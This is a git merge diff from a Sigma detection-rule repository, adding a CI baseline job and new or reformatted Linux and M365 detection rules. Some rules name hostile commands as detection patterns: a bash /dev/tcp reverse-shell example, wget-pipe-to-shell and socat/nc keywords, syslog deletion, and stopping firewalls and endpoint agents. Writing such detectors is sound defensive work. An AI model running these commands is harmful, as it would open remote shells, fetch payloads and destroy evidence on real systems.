Merge branch 'master' of https://github.com/Gude5/sigma

2022-09-29 09:57:29 +02:00
parent 8695880f36 428cb6ab74
commit d35ea51136
166 changed files with 2184 additions and 889 deletions
@@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py
 db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen
+1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon
 e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell
 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml
-8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC
+8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon)
 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_
 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR
 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote
 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe
 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4  Task: 0
-162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe
-cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241
-bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223
+162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe
+cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241
+bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223
 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;target\.exe
 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe
@@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att
 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$
 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC
 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6
+734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe
 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe
@@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe
 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe
 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe
+949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon
@@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy
      - oscd

 env:
-  EVTX_BASELINE_VERSION: v0.6
+  EVTX_BASELINE_VERSION: v0.7

 jobs:
  test-sigma:
@@ -132,3 +132,21 @@ jobs:
        ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json
    - name: Show findings excluding known FPs
      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
+  check-baseline-win2022-0-20348-azure:
+    runs-on: ubuntu-latest
+    steps:
+    - uses: actions/checkout@v2
+    - name: Download evtx-sigma-checker
+      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
+    - name: Download and extract Windows 2022.0.20348 Azure baseline
+      run: |
+        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz
+        tar xzf win2022-0-20348-azure.tgz
+    - name: Remove deprecated rules
+      run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v'
+    - name: Check for Sigma matches in baseline
+      run: |
+        chmod +x evtx-sigma-checker
+        ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json
+    - name: Show findings excluding known FPs
+      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
@@ -0,0 +1,23 @@
+title: PST Export Alert
+id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0
+status: experimental
+description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content
+author: 'Sorina Ionescu'
+date: 2022/02/08
+references:
+    - https://attack.mitre.org/techniques/T1114/
+logsource:
+    service: threat_management
+    product: m365
+detection:
+    selection:
+        eventSource: SecurityComplianceCenter
+        eventName: 'eDiscovery search started or exported'
+        status: success
+    condition: selection
+falsepositives:
+    - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.
+level: medium
+tags:
+    - attack.collection
+    - attack.t1114
@@ -5,21 +5,21 @@ author: 'Pawel Mazur'
 status: experimental
 date: 2021/11/18
 references:
-   - https://attack.mitre.org/tactics/TA0010/
-   - https://linux.die.net/man/1/wget
-   - https://gtfobins.github.io/gtfobins/wget/
+    - https://attack.mitre.org/tactics/TA0010/
+    - https://linux.die.net/man/1/wget
+    - https://gtfobins.github.io/gtfobins/wget/
 logsource:
-   product: linux
-   service: auditd
+    product: linux
+    service: auditd
 detection:
-   selection:
-       type: EXECVE
-       a0: wget
-       a1|startswith: '--post-file='
-   condition: selection
+    selection:
+        type: EXECVE
+        a0: wget
+        a1|startswith: '--post-file='
+    condition: selection
 tags:
-   - attack.exfiltration
-   - attack.t1048.003
+    - attack.exfiltration
+    - attack.t1048.003
 falsepositives:
-   - Legitimate usage of wget utility to post a file
-level: medium
+    - Legitimate usage of wget utility to post a file
+level: medium
@@ -4,33 +4,33 @@ status: test
 description: 'Detects commandline operations on shell history files'
 author: 'Mikhail Larin, oscd.community'
 references:
-  - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
 date: 2020/10/17
 modified: 2021/11/27
 logsource:
-  product: linux
-  service: auditd
+    product: linux
+    service: auditd
 detection:
-  execve:
-    type: EXECVE
-  history:
-    - '.bash_history'
-    - '.zsh_history'
-    - '.zhistory'
-    - '.history'
-    - '.sh_history'
-    - 'fish_history'
-  condition: execve and history
+    execve:
+        type: EXECVE
+    history:
+        - '.bash_history'
+        - '.zsh_history'
+        - '.zhistory'
+        - '.history'
+        - '.sh_history'
+        - 'fish_history'
+    condition: execve and history
 fields:
-  - a0
-  - a1
-  - a2
-  - a3
-  - key
+    - a0
+    - a1
+    - a2
+    - a3
+    - key
 falsepositives:
-  - Legitimate administrative activity
-  - Legitimate software, cleaning hist file
+    - Legitimate administrative activity
+    - Legitimate software, cleaning hist file
 level: medium
 tags:
-  - attack.credential_access
-  - attack.t1552.003
+    - attack.credential_access
+    - attack.t1552.003
@@ -4,56 +4,56 @@ status: test
 description: Detects suspicious shell commands used in various exploit codes (see references)
 author: Florian Roth
 references:
-  - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
-  - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
-  - http://pastebin.com/FtygZ1cg
-  - https://artkond.com/2017/03/23/pivoting-guide/
+    - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
+    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+    - http://pastebin.com/FtygZ1cg
+    - https://artkond.com/2017/03/23/pivoting-guide/
 date: 2017/08/21
 modified: 2021/11/27
 logsource:
-  product: linux
+    product: linux
 detection:
-  keywords:
+    keywords:
        # Generic suspicious commands
-    - 'wget * - http* | perl'
-    - 'wget * - http* | sh'
-    - 'wget * - http* | bash'
-    - 'python -m SimpleHTTPServer'
-    - '-m http.server'      # Python 3
-    - 'import pty; pty.spawn*'
-    - 'socat exec:*'
-    - 'socat -O /tmp/*'
-    - 'socat tcp-connect*'
-    - '*echo binary >>*'
+        - 'wget * - http* | perl'
+        - 'wget * - http* | sh'
+        - 'wget * - http* | bash'
+        - 'python -m SimpleHTTPServer'
+        - '-m http.server'      # Python 3
+        - 'import pty; pty.spawn*'
+        - 'socat exec:*'
+        - 'socat -O /tmp/*'
+        - 'socat tcp-connect*'
+        - '*echo binary >>*'
        # Malware
-    - '*wget *; chmod +x*'
-    - '*wget *; chmod 777 *'
-    - '*cd /tmp || cd /var/run || cd /mnt*'
+        - '*wget *; chmod +x*'
+        - '*wget *; chmod 777 *'
+        - '*cd /tmp || cd /var/run || cd /mnt*'
        # Apache Struts in-the-wild exploit codes
-    - '*stop;service iptables stop;*'
-    - '*stop;SuSEfirewall2 stop;*'
-    - 'chmod 777 2020*'
-    - '*>>/etc/rc.local'
+        - '*stop;service iptables stop;*'
+        - '*stop;SuSEfirewall2 stop;*'
+        - 'chmod 777 2020*'
+        - '*>>/etc/rc.local'
        # Metasploit framework exploit codes
-    - '*base64 -d /tmp/*'
-    - '* | base64 -d *'
-    - '*/chmod u+s *'
-    - '*chmod +s /tmp/*'
-    - '*chmod u+s /tmp/*'
-    - '* /tmp/haxhax*'
-    - '* /tmp/ns_sploit*'
-    - 'nc -l -p *'
-    - 'cp /bin/ksh *'
-    - 'cp /bin/sh *'
-    - '* /tmp/*.b64 *'
-    - '*/tmp/ysocereal.jar*'
-    - '*/tmp/x *'
-    - '*; chmod +x /tmp/*'
-    - '*;chmod +x /tmp/*'
-  condition: keywords
+        - '*base64 -d /tmp/*'
+        - '* | base64 -d *'
+        - '*/chmod u+s *'
+        - '*chmod +s /tmp/*'
+        - '*chmod u+s /tmp/*'
+        - '* /tmp/haxhax*'
+        - '* /tmp/ns_sploit*'
+        - 'nc -l -p *'
+        - 'cp /bin/ksh *'
+        - 'cp /bin/sh *'
+        - '* /tmp/*.b64 *'
+        - '*/tmp/ysocereal.jar*'
+        - '*/tmp/x *'
+        - '*; chmod +x /tmp/*'
+        - '*;chmod +x /tmp/*'
+    condition: keywords
 falsepositives:
-  - Unknown
+    - Unknown
 level: high
 tags:
-  - attack.execution
-  - attack.t1059.004
+    - attack.execution
+    - attack.t1059.004
@@ -3,21 +3,20 @@ id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
 status: experimental
 description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
 references:
-   - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
 date: 2021/10/16
 author: Florian Roth
 logsource:
-   product: linux
-   category: network_connection
+    product: linux
+    category: network_connection
 detection:
-   selection:
-      Image|endswith: '/bin/bash'
-   filter:
-      DestinationIp: 
-         - '127.0.0.1'
-         - '0.0.0.0'
-   condition: selection and not filter
+    selection:
+        Image|endswith: '/bin/bash'
+    filter:
+        DestinationIp:
+            - '127.0.0.1'
+            - '0.0.0.0'
+    condition: selection and not filter
 falsepositives:
-   - Unknown
+    - Unknown
 level: critical
-
@@ -13,8 +13,8 @@ logsource:
 detection:
    selection:
        Image|endswith:
-          - '/at'
-          - '/atd'
+            - '/at'
+            - '/atd'
    condition: selection
 falsepositives:
    - Legitimate administration activities
@@ -4,20 +4,20 @@ status: test
 description: Detects usage of base64 utility to decode arbitrary base64-encoded text
 author: Daniil Yugoslavskiy, oscd.community
 references:
-  - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
 date: 2020/10/19
 modified: 2021/11/27
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: '/base64'
-    CommandLine|contains: '-d'
-  condition: selection
+    selection:
+        Image|endswith: '/base64'
+        CommandLine|contains: '-d'
+    condition: selection
 falsepositives:
-  - Legitimate activities
+    - Legitimate activities
 level: low
 tags:
-  - attack.defense_evasion
-  - attack.t1027
+    - attack.defense_evasion
+    - attack.t1027
@@ -0,0 +1,27 @@
+title: Linux Base64 Encoded Shebang In CLI
+id: fe2f9663-41cb-47e2-b954-8a228f3b9dff
+status: experimental
+description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
+author: Nasreddine Bencherchali
+date: 2022/09/15
+references:
+    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html
+    - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
+logsource:
+    product: linux
+    category: process_creation
+detection:
+    selection:
+        CommandLine|contains:
+            - "IyEvYmluL2Jhc2" #!/bin/bash"
+            - "IyEvYmluL2Rhc2" #!/bin/dash"
+            - "IyEvYmluL3pza" #!/bin/zsh"
+            - "IyEvYmluL2Zpc2" #!/bin/fish
+            - "IyEvYmluL3No" # !/bin/sh"
+    condition: selection
+falsepositives:
+    - Legitimate administration activities
+level: medium
+tags:
+    - attack.defense_evasion
+    - attack.t1140
@@ -4,20 +4,20 @@ status: experimental
 description: Detects the usage of the unsafe bpftrace option
 author: Andreas Hunkeler (@Karneades)
 tags:
-  - attack.execution
-  - attack.t1059.004
+    - attack.execution
+    - attack.t1059.004
 references:
-  - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
-  - https://bpftrace.org/
+    - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/
+    - https://bpftrace.org/
 date: 2022/02/11
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection1:
-    Image|endswith: 'bpftrace'
-    CommandLine|contains: '--unsafe'
-  condition: selection1
+    selection:
+        Image|endswith: 'bpftrace'
+        CommandLine|contains: '--unsafe'
+    condition: selection
 falsepositives:
-  - Legitimate usage of the unsafe option
+    - Legitimate usage of the unsafe option
 level: medium
@@ -4,21 +4,25 @@ status: test
 description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
 author: Florian Roth
 references:
-  - https://github.com/sleventyeleven/linuxprivchecker/
+    - https://github.com/sleventyeleven/linuxprivchecker/
 date: 2022/06/20
+modified: 2022/09/15
 logsource:
-  category: process_creation
-  product: linux
+    category: process_creation
+    product: linux
 detection:
-  selection:
-    Image|endswith: 
-      - '/cat'
-      - 'grep'
-    CommandLine|contains: ' /etc/sudoers'
-  condition: selection
+    selection:
+        Image|endswith:
+            - '/cat'
+            - 'grep'
+            - '/head'
+            - '/tail'
+            - '/more'
+        CommandLine|contains: ' /etc/sudoers'
+    condition: selection
 falsepositives:
-  - Legitimate administration activities
+    - Legitimate administration activities
 level: medium
 tags:
-  - attack.reconnaissance
-  - attack.t1592.004
+    - attack.reconnaissance
+    - attack.t1592.004
@@ -0,0 +1,25 @@
+title: Remove Immutable File Attribute
+id: 34979410-e4b5-4e5d-8cfb-389fdff05c12
+related:
+    - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7
+      type: derived
+status: experimental
+description: Detects usage of the 'chattr' utility to remove immutable file attribute.
+author: Nasreddine Bencherchali
+references:
+    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+date: 2022/09/15
+logsource:
+    product: linux
+    category: process_creation
+detection:
+    selection:
+        Image|endswith: '/chattr'
+        CommandLine|contains: ' -i '
+    condition: selection
+falsepositives:
+    - Administrator interacting with immutable files (e.g. for instance backups).
+level: medium
+tags:
+    - attack.defense_evasion
+    - attack.t1222.002
@@ -4,7 +4,7 @@ status: stable
 description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
 author: Ömer Günal, oscd.community
 date: 2020/10/07
-modified: 2022/07/07
+modified: 2022/09/15
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md
 logsource:
@@ -15,6 +15,7 @@ detection:
        Image|endswith:
            - '/rm'    # covers /rmdir as well
            - '/shred'
+            - '/unlink'
        CommandLine|contains:
            - '/var/log'
            - '/var/spool/mail'
@@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31
 status: experimental
 description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks
 date: 2021/10/15
-modified: 2022/07/07
+modified: 2022/09/15
 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
 tags:
    - attack.defense_evasion
@@ -20,6 +20,10 @@ detection:
            - 'rm -r /var/log/syslog'
            - 'rm -f /var/log/syslog'
            - 'rm -rf /var/log/syslog'
+            - 'unlink /var/log/syslog'
+            - 'unlink -r /var/log/syslog'
+            - 'unlink -f /var/log/syslog'
+            - 'unlink -rf /var/log/syslog'
            - 'mv /var/log/syslog'
            - ' >/var/log/syslog'
            - ' > /var/log/syslog'
@@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316
 status: experimental
 description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.
 date: 2021/10/15
-modified: 2022/07/07
+modified: 2022/09/15
 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
 tags:
    - attack.collection
@@ -14,19 +14,13 @@ logsource:
    product: linux
    category: process_creation
 detection:
-    selection1:
+    selection:
        Image|contains: 'xclip'
-    selection2:
-        CommandLine|contains:
-            - '-selection'
+        CommandLine|contains|all:
            - '-sel'
-    selection3:
-        CommandLine|contains:
-            - 'clipboard'
            - 'clip'
-    selection4:
-        CommandLine|contains: '-o'
-    condition: all of selection*
+            - '-o'
+    condition: selection
 falsepositives:
    - Legitimate usage of xclip tools.
 level: low
@@ -0,0 +1,21 @@
+title: Remove Scheduled Cron Task/Job
+id: c2e234de-03a3-41e1-b39a-1e56dc17ba67
+status: experimental
+description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
+author: Nasreddine Bencherchali
+references:
+    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+date: 2022/09/15
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        Image|endswith: 'crontab'
+        CommandLine|contains: ' -r'
+    condition: selection
+falsepositives:
+    - Unknown
+level: medium
+tags:
+    - attack.defense_evasion
@@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1
 status: experimental
 description: Detects command line parameters or strings often used by crypto miners
 references:
-   - https://www.poolwatch.io/coin/monero
+    - https://www.poolwatch.io/coin/monero
 date: 2021/10/26
 author: Florian Roth
 logsource:
-   product: linux
-   category: process_creation
+    product: linux
+    category: process_creation
 detection:
-   selection:
-      CommandLine|contains:
-        - ' --cpu-priority='
-        - '--donate-level=0'
-        - ' -o pool.'
-        - ' --nicehash'
-        - ' --algo=rx/0 '
-        - 'stratum+tcp://'
-        - 'stratum+udp://'
-        # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives
-        - 'sh -c /sbin/modprobe msr allow_writes=on'
-        # base64 encoded: --donate-level=
-        - 'LS1kb25hdGUtbGV2ZWw9'
-        - '0tZG9uYXRlLWxldmVsP'
-        - 'tLWRvbmF0ZS1sZXZlbD'
-        # base64 encoded: stratum+tcp:// and stratum+udp:// 
-        - 'c3RyYXR1bSt0Y3A6Ly'
-        - 'N0cmF0dW0rdGNwOi8v'
-        - 'zdHJhdHVtK3RjcDovL'
-        - 'c3RyYXR1bSt1ZHA6Ly'
-        - 'N0cmF0dW0rdWRwOi8v'
-        - 'zdHJhdHVtK3VkcDovL'
-   condition: selection
+    selection:
+        CommandLine|contains:
+            - ' --cpu-priority='
+            - '--donate-level=0'
+            - ' -o pool.'
+            - ' --nicehash'
+            - ' --algo=rx/0 '
+            - 'stratum+tcp://'
+            - 'stratum+udp://'
+            # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives
+            - 'sh -c /sbin/modprobe msr allow_writes=on'
+            # base64 encoded: --donate-level=
+            - 'LS1kb25hdGUtbGV2ZWw9'
+            - '0tZG9uYXRlLWxldmVsP'
+            - 'tLWRvbmF0ZS1sZXZlbD'
+            # base64 encoded: stratum+tcp:// and stratum+udp://
+            - 'c3RyYXR1bSt0Y3A6Ly'
+            - 'N0cmF0dW0rdGNwOi8v'
+            - 'zdHJhdHVtK3RjcDovL'
+            - 'c3RyYXR1bSt1ZHA6Ly'
+            - 'N0cmF0dW0rdWRwOi8v'
+            - 'zdHJhdHVtK3VkcDovL'
+    condition: selection
 falsepositives:
-   - Legitimate use of crypto miners
+    - Legitimate use of crypto miners
 level: high
@@ -0,0 +1,22 @@
+title: Curl Usage on Linux
+id: ea34fb97-e2c4-4afb-810f-785e4459b194
+status: experimental
+description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
+author: Nasreddine Bencherchali
+references:
+    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
+date: 2022/09/15
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        Image|endswith: '/curl'
+    condition: selection
+falsepositives:
+    - Scripts created by developers and admins
+    - Administrative activity
+level: low
+tags:
+    - attack.command_and_control
+    - attack.t1105
@@ -1,7 +1,7 @@
 title: Linux Doas Tool Execution
 id: 067d8238-7127-451c-a9ec-fa78045b618b
 status: stable
-description: Detects the doas tool execution in linux host platform.
+description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
 references:
    - https://research.splunk.com/endpoint/linux_doas_tool_execution/
    - https://www.makeuseof.com/how-to-install-and-use-doas/
@@ -1,9 +1,10 @@
 title: File Deletion
 id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57
 status: stable
-description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
 author: Ömer Günal, oscd.community
 date: 2020/10/07
+modified: 2022/09/15
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
 logsource:
@@ -14,6 +15,7 @@ detection:
        Image|endswith:
            - '/rm'     # covers /rmdir as well
            - '/shred'
+            - '/unlink'
    condition: selection
 falsepositives:
    - Legitimate administration activities
@@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
 date: 2020/10/08
-modified: 2022/07/07
+modified: 2022/09/15
 logsource:
    category: process_creation
    product: linux
@@ -16,9 +16,14 @@ detection:
    selection_2:
        CommandLine|contains: '''x:0:'''
    selection_3:
-        Image|endswith: '/cat'
+        Image|endswith:
+            - '/cat'
+            - '/head'
+            - '/tail'
+            - '/more'
        CommandLine|contains:
            - '/etc/passwd'
+            - '/etc/shadow'
            - '/etc/sudoers'
    selection_4:
        Image|endswith: '/id'
@@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
 date: 2020/10/11
-modified: 2022/07/07
+modified: 2022/09/15
 logsource:
    category: process_creation
    product: linux
@@ -14,7 +14,11 @@ detection:
    selection_1:
        Image|endswith: '/groups'
    selection_2:
-        Image|endswith: '/cat'
+        Image|endswith:
+            - '/cat'
+            - '/head'
+            - '/tail'
+            - '/more'
        CommandLine|contains: '/etc/group'
    condition: 1 of selection*
 falsepositives:
@@ -4,17 +4,17 @@ status: experimental
 description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
 author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'
 references:
-  - https://gtfobins.github.io/gtfobins/nohup/
-  - https://en.wikipedia.org/wiki/Nohup
-  - https://www.computerhope.com/unix/unohup.htm
+    - https://gtfobins.github.io/gtfobins/nohup/
+    - https://en.wikipedia.org/wiki/Nohup
+    - https://www.computerhope.com/unix/unohup.htm
 date: 2022/06/06
 logsource:
-  product: linux
-  category: process_creation
+    product: linux
+    category: process_creation
 detection:
-  selection:
-    Image|endswith: '/nohup'
-  condition: selection
+    selection:
+        Image|endswith: '/nohup'
+    condition: selection
 falsepositives:
-  - Administrators or installed processes that leverage nohup
+    - Administrators or installed processes that leverage nohup
 level: medium
@@ -26,4 +26,4 @@ detection:
    condition: selection_image and 1 of selection_cli*
 falsepositives:
    - Unknown
-level: high
+level: high
@@ -1,18 +1,21 @@
 title: Security Software Discovery
 id: c9d8b7fd-78e4-44fe-88f6-599135d46d60
 status: test
-description: Detects usage of system utilities (only grep for now) to discover security software discovery
+description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
 author: Daniil Yugoslavskiy, oscd.community
 references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md
 date: 2020/10/19
-modified: 2022/07/11
+modified: 2022/09/15
 logsource:
    category: process_creation
    product: linux
 detection:
    selection:
-        Image|endswith: '/grep'
+        Image|endswith:
+            # You can add more grep variations such as fgrep, rgrep...etc
+            - '/grep'
+            - '/egrep'
        CommandLine|contains:
            - 'nessusd'        # nessus vulnerability scanner
            - 'td-agent'       # fluentd log shipper
@@ -17,66 +17,66 @@ detection:
    selection_iptables_1:
        Image|endswith: '/service'
        CommandLine|contains|all:
-          - 'iptables'
-          - 'stop'
+            - 'iptables'
+            - 'stop'
    selection_iptables_2:
        Image|endswith: '/service'
        CommandLine|contains|all:
-          - 'ip6tables'
-          - 'stop'
+            - 'ip6tables'
+            - 'stop'
    selection_iptables_3:
        Image|endswith: '/chkconfig'
        CommandLine|contains|all:
-          - 'iptables'
-          - 'stop'
+            - 'iptables'
+            - 'stop'
    selection_iptables_4:
        Image|endswith: '/chkconfig'
        CommandLine|contains|all:
-          - 'ip6tables'
-          - 'stop'
+            - 'ip6tables'
+            - 'stop'
    selection_firewall_1:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'firewalld'
-          - 'stop'
+            - 'firewalld'
+            - 'stop'
    selection_firewall_2:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'firewalld'
-          - 'disable'
+            - 'firewalld'
+            - 'disable'
    selection_carbonblack_1:
        Image|endswith: '/service'
        CommandLine|contains|all:
-          - 'cbdaemon'
-          - 'stop'
+            - 'cbdaemon'
+            - 'stop'
    selection_carbonblack_2:
        Image|endswith: '/chkconfig'
        CommandLine|contains|all:
-          - 'cbdaemon'
-          - 'off'
+            - 'cbdaemon'
+            - 'off'
    selection_carbonblack_3:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'cbdaemon'
-          - 'stop'
+            - 'cbdaemon'
+            - 'stop'
    selection_carbonblack_4:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'cbdaemon'
-          - 'disable'
+            - 'cbdaemon'
+            - 'disable'
    selection_selinux:
        Image|endswith: '/setenforce'
        CommandLine|contains: '0'
    selection_crowdstrike_1:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'stop'
-          - 'falcon-sensor'
+            - 'stop'
+            - 'falcon-sensor'
    selection_crowdstrike_2:
        Image|endswith: '/systemctl'
        CommandLine|contains|all:
-          - 'disable'
-          - 'falcon-sensor'
+            - 'disable'
+            - 'falcon-sensor'
    condition: 1 of selection*
 falsepositives:
